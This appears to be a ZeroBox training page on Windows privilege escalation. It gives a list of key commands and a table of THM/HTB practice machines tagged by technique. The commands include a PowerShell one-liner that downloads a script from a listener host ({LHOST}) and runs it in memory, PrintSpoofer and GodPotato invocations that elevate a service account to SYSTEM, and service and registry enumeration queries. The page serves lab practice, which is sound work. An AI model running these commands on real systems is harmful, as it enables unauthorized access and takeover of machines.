ZeroBox

Windows Privilege Escalation: practice machines and key commands

Windows privilege escalation starts with understanding who you are and what the account can do. Run whoami /all and look for SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, which service accounts usually hold and which potato style tools such as PrintSpoofer and GodPotato convert to SYSTEM. Other common paths are unquoted service paths, weak service binary or registry permissions, AlwaysInstallElevated, stored credentials, scheduled tasks and UAC bypasses when you are an administrator in a medium integrity shell. Automated scripts like WinPEAS list candidates quickly, but verify each finding by hand. Check the architecture and OS build before choosing an exploit. These machines cover the main Windows escalation families. Note the integrity level of your shell, because many techniques only work from a service context or an elevated prompt. Keep payloads small, test in a lab copy first, and clean up any service or registry change you make so the box stays stable for later steps.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

WinPEAS In-Memory Download & Execute

Execute WinPEAS privilege escalation scanner directly in memory via WebClient.

powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://{LHOST}:8000/winPEAS.ps1')"

GodPotato SeImpersonatePrivilege Exploit

Abuse SeImpersonatePrivilege on Windows Server 2012-2022 via DCOM/RPC reflection.

GodPotato-NET4.exe -cmd "cmd.exe /c whoami"

PrintSpoofer SeImpersonate / Named Pipe Exploit

Elevate from service account to SYSTEM via print spooler named pipe reflection.

PrintSpoofer64.exe -i -c cmd

Unquoted Service Path Enumeration

Detect auto-starting Windows services with unquoted executable paths containing spaces.

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

AlwaysInstallElevated Registry Query

Verify if MSI packages run with elevated SYSTEM permissions via registry keys.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Keep going

Windows Privilege Escalation machines (11)

Machines are matched by their technique tags. 11 Windows.

Easy (2)

MachinePlatformOSTags
AlfredTHMWindowsOSCP, Jenkins, PowerShell, Token Impersonation
Steel MountainTHMWindowsOSCP, Rejetto HFS, CVE-2014-6287, Unquoted Service Path

Medium (8)

MachinePlatformOSTags
ArkhamHTBWindowsHTB, Java-Deserialization, UAC-bypass
BlasterTHMWindowsRDP, CVE-2019-1388, UAC-Bypass
HospitalHTBWindowsRoundcube, Webmail, CVE-2023-43770, SeImpersonatePrivilege
RelevantTHMWindowsOSCP, SMB, IIS, WebShell
VisualHTBWindowsCPTS, Visual Studio, MSBuild, SeImpersonatePrivilege
Windows Local PersistenceTHMWindowsPersistence, Registry, Scheduled Tasks, Services
Windows PrivEscTHMWindowsPrivilege Escalation, UAC Bypass, Service Exploitation, DLL Hijacking
Windows PrivEsc ArenaTHMWindowsPrivilege Escalation, AlwaysInstallElevated, Unquoted Service Path, Registry

Hard (1)

MachinePlatformOSTags
RetroTHMWindowsWordPress, RDP, CVE-2019-1388

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox